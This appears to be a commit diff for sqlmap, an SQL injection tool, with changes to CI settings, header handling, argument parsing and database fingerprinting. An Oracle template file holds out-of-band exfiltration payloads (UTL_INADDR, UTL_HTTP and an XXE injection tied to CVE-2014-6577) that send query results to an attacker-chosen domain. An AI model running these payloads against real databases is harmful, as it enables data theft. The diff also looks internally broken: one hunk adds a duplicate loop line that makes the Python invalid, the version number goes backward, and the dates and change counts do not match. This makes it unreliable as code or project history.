Fixes #5428

2025-12-07 21:21:33 +00:00 · 2023-06-02 11:25:07 +02:00
8 changed files with 10 additions and 12 deletions
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -10,7 +10,7 @@ jobs:
    strategy:
      matrix:
        os: [ubuntu-latest, macos-latest, windows-latest]
-        python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
+        python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,3 +1,2 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -222,8 +222,7 @@ class Agent(object):
            def _(pattern, repl, string):
                retVal = string
                match = None
-
+                for match in re.finditer(pattern, string):
                for match in re.finditer(pattern, string or ""):
                    pass
                if match:
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@ from thirdparty import six
 from thirdparty.six import unichr as _unichr
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.7.7.0"
+VERSION = "1.7.6.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -1001,9 +1001,6 @@ def cmdLineParser(argv=None):
                argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1)
            elif argv[i].startswith("--drop-cookie"):
                argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1)
            elif re.search(r"\A--tamper[^=\s]", argv[i]):
                argv[i] = ""
                continue
            elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]):
                key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1)
                index = auxIndexes.get(key, None)
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -441,7 +441,7 @@ class Connect(object):
            requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str
            # Prepare HTTP headers
-            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {})
+            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})
            if HTTP_HEADER.COOKIE in headers:
                cookie = headers[HTTP_HEADER.COOKIE]
@@ -453,6 +453,9 @@ class Connect(object):
                headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
            if not conf.requestFile or not target:
                if not getHeader(headers, HTTP_HEADER.HOST):
                    headers[HTTP_HEADER.HOST] = getHostHeader(url)
                if not getHeader(headers, HTTP_HEADER.ACCEPT):
                    headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
--- a/plugins/dbms/h2/fingerprint.py
+++ b/plugins/dbms/h2/fingerprint.py
@@ -87,7 +87,7 @@ class Fingerprint(GenericFingerprint):
        infoMsg = "testing %s" % DBMS.H2
        logger.info(infoMsg)
-        result = inject.checkBooleanExpression("ZERO()=0")
+        result = inject.checkBooleanExpression("ZERO() IS 0")
        if result:
            infoMsg = "confirming %s" % DBMS.H2
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -45,9 +45,9 @@ class Fingerprint(GenericFingerprint):
        # Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
        versions = (
-            (80000, 80033),  # MySQL 8.0
+            (80000, 80029),  # MySQL 8.0
            (60000, 60014),  # MySQL 6.0
-            (50700, 50742),  # MySQL 5.7
+            (50700, 50741),  # MySQL 5.7
            (50600, 50652),  # MySQL 5.6
            (50500, 50563),  # MySQL 5.5
            (50400, 50404),  # MySQL 5.4